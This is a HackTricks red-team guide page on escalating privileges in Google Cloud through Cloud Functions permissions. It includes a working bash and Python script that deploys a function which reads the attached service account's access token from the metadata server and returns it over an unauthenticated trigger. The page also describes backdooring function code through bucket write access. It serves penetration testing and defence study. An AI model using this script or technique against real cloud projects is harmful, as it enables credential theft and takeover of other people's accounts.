Skip to content

Latest commit

 

History

History
142 lines (94 loc) · 7.78 KB

File metadata and controls

142 lines (94 loc) · 7.78 KB

GCP - Cloudfunctions Privesc

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

cloudfunctions

More information about Cloud Functions:

{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %} gcp-cloud-functions-enum.md {% endcontent-ref %}

cloudfunctions.functions.create , cloudfunctions.functions.sourceCodeSet, iam.serviceAccounts.actAs

An attacker with these privileges can create a new Cloud Function with arbitrary (malicious) code and assign it a Service Account. Then, leak the Service Account token from the metadata to escalate privileges to it.
Some privileges to trigger the function might be required.

Exploit scripts for this method can be found here and here and the prebuilt .zip file can be found here.

cloudfunctions.functions.update , cloudfunctions.functions.sourceCodeSet, iam.serviceAccounts.actAs

An attacker with these privileges can modify the code of a Function and even modify the service account attached with the goal of exfiltrating the token.

{% hint style="danger" %} In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image. {% endhint %}

Some extra privileges like .call permission for version 1 cloudfunctions or the role role/run.invoker to trigger the function might be required.

# Create new code
temp_dir=$(mktemp -d)

cat > $temp_dir/main.py <<EOF
import subprocess

def main(request):
    cmd = "curl -s -f -H 'Metadata-Flavor: Google' 'http://metadata/computeMetadata/v1/instance/service-accounts/default/token'"
    result = subprocess.check_output(cmd, shell=True, text=True)
    return result
EOF

echo "" > $temp_dir/requirements.txt

zip -r $temp_dir/function.zip $temp_dir/main.py $temp_dir/requirements.txt

# Update code
gcloud functions deploy <cloudfunction-name> \
  --runtime python312 \
  --source $temp_dir \
  --entry-point main \
  --service-account <sa>@$PROJECT_ID.iam.gserviceaccount.com \
  --trigger-http \
  --allow-unauthenticated

# Get SA token calling the new function code
gcloud functions call <cloudfunction-name>

{% hint style="danger" %} If you get the error Permission 'run.services.setIamPolicy' denied on resource... is because you are using the --allow-unauthenticated param and you don't have enough permissions for it. {% endhint %}

The exploit script for this method can be found here.

cloudfunctions.functions.sourceCodeSet

With this permission you can get a signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)

{% code overflow="wrap" %}

# Generate the URL
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \
-H "Authorization: Bearer $(gcloud auth application-default print-access-token)" \
-H "Content-Type: application/json" \
-d '{}'

{% endcode %}

Not really sure how useful only this permission is from an attackers perspective, but good to know.

cloudfunctions.functions.setIamPolicy , iam.serviceAccounts.actAs

Give yourself any of the previous .update or .create privileges to escalate.

cloudfunctions.functions.update

Only having cloudfunctions permissions, without iam.serviceAccounts.actAs you won't be able to update the function SO THIS IS NOT A VALID PRIVESC.

Read & Write Access over the bucket

If you have read and write access over the bucket you can monitor changes in the code and whenever an update in the bucket happens you can update the new code with your own code that the new version of the Cloud Function will be run with the submitted backdoored code.

You can check more about the attack in:

{% content-ref url="gcp-storage-privesc.md" %} gcp-storage-privesc.md {% endcontent-ref %}

However, you cannot use this to pre-compromise third party Cloud Functions because if you create the bucket in your account and give it public permissions so the external project can write over it, you get the following error:

{% hint style="danger" %} However, this could be used for DoS attacks. {% endhint %}

Read & Write Access over Artifact Registry

When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the cache image) and nothing changed, the cloud function continue working. Therefore, maybe it might be possible to abuse a Race Condition attack like with the bucket to change the docker container that will be run but just modifying the stored image isn't possible to compromise the Cloud Function.

References

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}